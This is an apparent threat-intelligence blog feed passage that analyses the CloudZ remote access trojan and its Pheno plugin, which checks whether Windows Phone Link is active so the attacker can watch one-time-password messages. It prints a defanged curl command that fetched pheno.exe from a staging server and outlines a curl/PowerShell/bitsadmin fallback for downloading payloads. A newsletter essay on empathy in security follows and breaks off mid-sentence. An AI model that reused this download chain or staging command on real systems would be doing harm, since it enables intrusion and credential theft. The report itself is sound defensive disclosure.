Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1986664053" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{209}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Msg</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="650220655" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{216}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Send message to C2</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="18" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="891005369" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{224}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RXJyb3I=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="180547162" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{231}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Error</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1854929042" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{238}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Error reporting back to C2</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="19" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol LastRow SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1093022703" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{246}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SpellingErrorV2Themed SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; background-position: 0px 100%; background-repeat: repeat-x; background-image: var(--urlSpellingErrorV2,url(&quot;data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjQiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHBhdGggc3Ryb2tlPSIjRUIwMDAwIiBkPSJNMCAzYzEuMjUgMCAxLjI1LTIgMi41LTJTMy43NSAzIDUgMyIvPjxwYXRoIGQ9Ik0wIDBoNXY0SDB6Ii8+PC9nPjwvc3ZnPg==&quot;)); border-bottom: 1px solid transparent; -webkit-nbsp-mode: normal !important;">cmVj</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastRow SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="388339271" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{253}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">rec</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol LastRow SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1811233859" paraeid="{32c6b2e1-0ae6-45fe-873f-7a7b6bfb88d3}{5}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Screen recording</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr></tbody></table>
<!--kg-card-end: html-->
<p>The RAT&#xA0;employs various methods to download and execute the&#xA0;plugins.&#xA0;The&#xA0;plugin download&#xA0;feature of RAT&#xA0;uses&#xA0;a&#xA0;three-method fallback approach.&#xA0;It first checks for the presence of the curl utility. If found, it&#xA0;attempts&#xA0;to download the file from a specified URL to a target path while following redirects. If curl is missing or the command fails, it falls back to PowerShell, where it first tries to download the file using the&#xA0;<code>Invoke-WebRequest</code>&#xA0;command. If that method also&#xA0;fails,&#xA0;it executes a final&#xA0;method&#xA0;that uses the&#xA0;LOLBin&#x201C;bitsadmin&#x201D; tool to download and save the plugin payloads to the victim machine.&#xA0;&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-26486023-9bb2-4eec-abc6-a6f50e4f9049.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="106" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-26486023-9bb2-4eec-abc6-a6f50e4f9049.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-26486023-9bb2-4eec-abc6-a6f50e4f9049.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 11.&#xA0;CloudZ&#x2019;s&#xA0;embedded PowerShell command with three different&#xA0;approaches&#xA0;to&#xA0;download operation. </span></figcaption></figure><p>Talos&#xA0;observed&#xA0;from the telemetry data that the attacker has downloaded and implanted the&#xA0;Pheno&#xA0;plugin through the curl command from the staging server.&#xA0;</p>
<!--kg-card-begin: html-->
<pre>curl -L -o C:\Windows\TEMP\pheno.exe hxxps[://]orange-cell-1353[.]hellohiall[.]workers[.]dev/pheno.exe</pre>
<!--kg-card-end: html-->
<h2 id="pheno-plugin-to-perform-the-phone-link-application-recon">Pheno&#xA0;plugin&#xA0;to perform the Phone Link&#xA0;application&#xA0;recon&#xA0;</h2><p>In this&#xA0;intrusion,&#xA0;Talos&#xA0;observed&#xA0;that the attacker used a plugin called&#xA0;Pheno&#xA0;to&#xA0;perform&#xA0;reconnaissance of the Windows Phone Link application in the victim machine.&#xA0;&#xA0;</p><p>Pheno&#xA0;is designed to detect if a user is currently&#xA0;syncing&#xA0;their mobile device to&#xA0;a&#xA0;Windows&#xA0;machine through&#xA0;the&#xA0;Phone Link&#xA0;application. It scans all running processes for specific keywords&#xA0;such as&#xA0;&quot;YourPhone,&quot; &quot;PhoneExperienceHost,&quot; or &quot;Link to Windows,&quot; and if matches are found, it logs their Process IDs and file paths to the files with the&#xA0;filename&#xA0;&#x201C;phonelink-&lt;COMPUTERNAME&gt;.txt&#x201D;, created in two&#xA0;staging&#xA0;folders such&#xA0;as&#xA0;:&#xA0;</p><ul><li>&#xA0;C:\programdata\Microsoft\feedback\cm&#xA0;</li><li>&#xA0;%TEMP%\Microsoft\feedback\cm&#xA0;</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-077640e8-d93d-4728-b322-af886fe8bd94-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="587" height="494"><figcaption><span style="white-space: pre-wrap;">Figure 11.&#xA0;Pheno&#xA0;recon plugin that&#xA0;monitors&#xA0;an active PC-to-phone bridge through Phone Link application.&#xA0;</span></figcaption></figure><p>After checking Phone Link processes and writing its results,&#xA0;Pheno&#xA0;executes a secondary check that reads back the contents of previously written files and searches the keyword &quot;proxy&quot; in a case-insensitive manner.&#xA0;The plugin conducts this check because the Microsoft Phone Link application creates a local proxy connection to relay traffic between the PC and the paired mobile device. The presence of &quot;proxy&quot; in the output files, whether generated by&#xA0;a previous&#xA0;execution of the&#xA0;pheno&#xA0;plugin,&#xA0;indicates&#xA0;that the Phone Link session is actively routing traffic through its relay channel.&#xA0;&#xA0;</p><p>When the keyword is detected, the&#xA0;pheno&#xA0;plugin writes &quot;Maybe connected&quot; to its output file in the staging&#xA0;folders,&#xA0;which eventually allows the attacker,&#xA0;with the help of&#xA0;CloudZ&#xA0;RAT,&#xA0;to&#xA0;potentially&#xA0;monitor&#xA0;SMS or OTP&#xA0;requests that&#xA0;appear&#xA0;on the Phone Link application.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-f2d591b6-750a-49a9-837b-2a0681a4c767-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="418" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-f2d591b6-750a-49a9-837b-2a0681a4c767-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-f2d591b6-750a-49a9-837b-2a0681a4c767-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 12.&#xA0;Pheno&#xA0;checking&#xA0;for&#xA0;a&#xA0;previous&#xA0;instance&#xA0;of PC-to-phone bridge through Phone Link application.&#xA0;</span></figcaption></figure><h2 id="coverage">Coverage</h2><p>The following ClamAV signature detects and blocks this threat:&#xA0;</p><ul><li>Win.Packed.Msilheracles-10030690-0&#xA0;</li><li>Win.Trojan.CloudZRAT-10059935-0&#xA0;</li><li>Win.Trojan.CloudZRAT-10059959-0&#xA0;</li></ul><p>The following Snort Rules (SIDs) detect and block this threat:&#xA0;</p><ul><li>Snort&#xA0;2:&#xA0;66409, 66410, 66408&#xA0;</li><li>Snort&#xA0;3:&#xA0;301492, 66408&#xA0;</li></ul><h2 id="indicators-of-compromise-iocs">Indicators of&#xA0;compromise&#xA0;(IOCs)&#xA0;</h2><p>The IOCs for this threat are available at our GitHub repository&#xA0;<a href="https://github.com/Cisco-Talos/IOCs/blob/main/2026/05/cloudz-pheno-infostealer.txt" rel="noreferrer">here</a>.</p>]]></content:encoded></item><item><title><![CDATA[Great responsibility, without great power]]></title><description><![CDATA[In this week’s newsletter, Hazel uses International Superhero Day as a springboard to explore why empathy — rather than just technical prowess — is the most essential, underrated superpower for navigating the human side of cybersecurity.]]></description><link>https://blog.talosintelligence.com/great-responsibility-without-great-power/</link><guid isPermaLink="false">69f351e2d2ad2b00012dcad6</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Thu, 30 Apr 2026 18:00:07 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-4.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-4.jpg" alt="Great responsibility, without great power"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>As&#xA0;I&#x2019;m&#xA0;writing this, today (April 28) is International Superhero Day. If you&#xA0;don&#x2019;t&#xA0;know the origin story behind this,&#xA0;perhaps you&#xA0;would assume that this day was dreamed up by Marvel. And&#x2026; you would be correct.&#xA0;</p><p>However,&#xA0;it&#x2019;s&#xA0;not a pure marketing ploy. It all started in 1995, when colleagues in Marvel asked a group of school children what superpower&#xA0;they&#x2019;d&#xA0;want the most.&#xA0;&#xA0;</p><p>Through the discussion, it became clear that the people in the children&#x2019;s lives were already doing&#xA0;pretty heroic&#xA0;things, without the benefit of Hindsight Lad. (He&#x2019;s&#xA0;a real Marvel invention &#x2014; Carlton&#xA0;LaFroyge&#xA0;&#x2014; whose superpower was to make aggressively obvious observations, delivered too late to matter.&#xA0;I&#x2019;m&#xA0;sure we all have a real-life Carlton&#xA0;LaFroyge&#xA0;in our lives&#x2026; heck, some of us ARE Carlton&#xA0;LaFroyge.)&#xA0;</p><p>Ok, before I get to my next point, I need to take you down the same internet wormhole I just disappeared into. Here are some of the weirdest superpowers ever committed to comic book lore:&#xA0;</p><ol><li>Eye-Scream. His one power is to become ice cream (soft serve, apparently). Not to be confused with another Marvel character, Soft Serve, whose body acts as a portal to an ice cream dimension.&#xA0;</li><li>Doorman. Recently seen sending Josh Gad into the Dark Dimension (where there&#xA0;presumably is&#xA0;no ice cream) in the Marvel TV show &#x201C;WonderMan.&#x201D; Because his body is a door. Man.&#xA0;&#xA0;</li><li>The Wall. Has the ability to turn himself into a brick wall. I would genuinely love this ability during socially awkward networking events.&#xA0;</li></ol><p>Now&#xA0;I&#x2019;m&#xA0;thinking how awesome a character called &#x201C;Internet Wormhole&#x201D; would be. I just looked it up, and such a character&#xA0;doesn&#x2019;t&#xA0;exist yet (call me, Marvel).&#xA0;&#xA0;</p><p>Right,&#xA0;let&#x2019;s&#xA0;get back on topic. Ooh&#x2026; &#x201C;On topic&#x201D; would be another&#xA0;good idea&#xA0;for a super&#x2026; no,&#xA0;Hazel, no.&#xA0;</p><p>Anyway, the children&#x2019;s ability to&#xA0;identify&#xA0;the people closest to them &#x2014; parents, grandparents, teachers, uncles, and aunts &#x2014; as heroes is a comforting thought for me. Having someone&#x2019;s back is more about showing up than anything else. Being there for them when they need it (and when they&#xA0;don&#x2019;t&#xA0;even realise they need it). Helping to make someone&#x2019;s situation a little bit less bad.&#xA0;&#xA0;</p><p>I can think of a few people in my life who have done, and continue to do, exactly that for me, which makes me feel incredibly lucky. And in an industry like cybersecurity, where&#xA0;bad things&#xA0;happen every single day, it matters more than we tend to admit. You need people around you who can steady things, who can sense you need support, who can listen to you, and who can tell you a silly story on a bleak day.&#xA0;</p><p>Empathy&#xA0;doesn&#x2019;t&#xA0;usually get listed as a specific skillset within cybersecurity, but I think I, and many of my Talos colleagues, would agree that&#xA0;it&#x2019;s&#xA0;absolutely essential. Users make decisions for reasons that make sense to them. Attackers take advantage of that. If you&#xA0;can&#x2019;t&#xA0;see both sides of that equation,&#xA0;you&#x2019;re&#xA0;probably not&#xA0;helping as many people as you could.&#xA0;&#xA0;</p><p>I&#x2019;ll&#xA0;end by answering the ultimate question &#x2014; who is the greatest superhero of all time?&#xA0;&#xA0;</p><p>It&#x2019;s&#xA0;obviously Squirrel Girl. She bested&#xA0;Galactus&#xA0;with a cup of tea and a chat. And though my mum has never been in the same room as&#xA0;Galactus, I have no doubt&#xA0;she&#x2019;d&#xA0;handle him in&#xA0;exactly the sameway.&#xA0;</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos is wrapping up Year in Review coverage by giving&#xA0;<a href="https://blog.talosintelligence.com/five-defender-priorities-from-the-talos-year-in-review/" rel="noreferrer noopener"><strong><u>five critical priorities</u></strong></a>&#xA0;to help defenders navigate an increasingly automated threat landscape. While AI and readily available exploit code have drastically lowered the barrier to entry for threat actors, these adversaries still rely on predictable patterns. Identity infrastructure, exposed legacy systems, and platforms that broker trust&#xA0;remain&#xA0;the primary battlegrounds.&#xA0;Ultimately, even&#xA0;the fastest automated attacks generate anomalous behavior that stands out from normal user activity.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>The speed at which attackers weaponize vulnerabilities and target identity systems &#x2014; highlighted by a 178 percent spike in device compromise &#x2014; can feel overwhelming. But there is&#xA0;a silver lining&#xA0;for security teams. Because adversaries inevitably reuse infrastructure and&#xA0;fail to&#xA0;mimic legitimate user behavior, defenders&#xA0;maintain&#xA0;a distinct advantage if they know exactly where to look.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Security teams need to focus on what they can control right now by treating identity infrastructure as a top-tier critical asset. Secure your MFA workflows with strict verification and build baseline detections around what users&#xA0;actually do&#xA0;after they log in. Prioritize patching vulnerabilities based on internet exposure rather than only severity&#xA0;scores, and&#xA0;actively hunt down the long tail of legacy risks hiding in your network. Finally, apply enhanced monitoring to management-plane systems and focus your detection efforts on anomalous events to cut through the noise of alert fatigue.&#xA0;</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>Home security giant ADT data 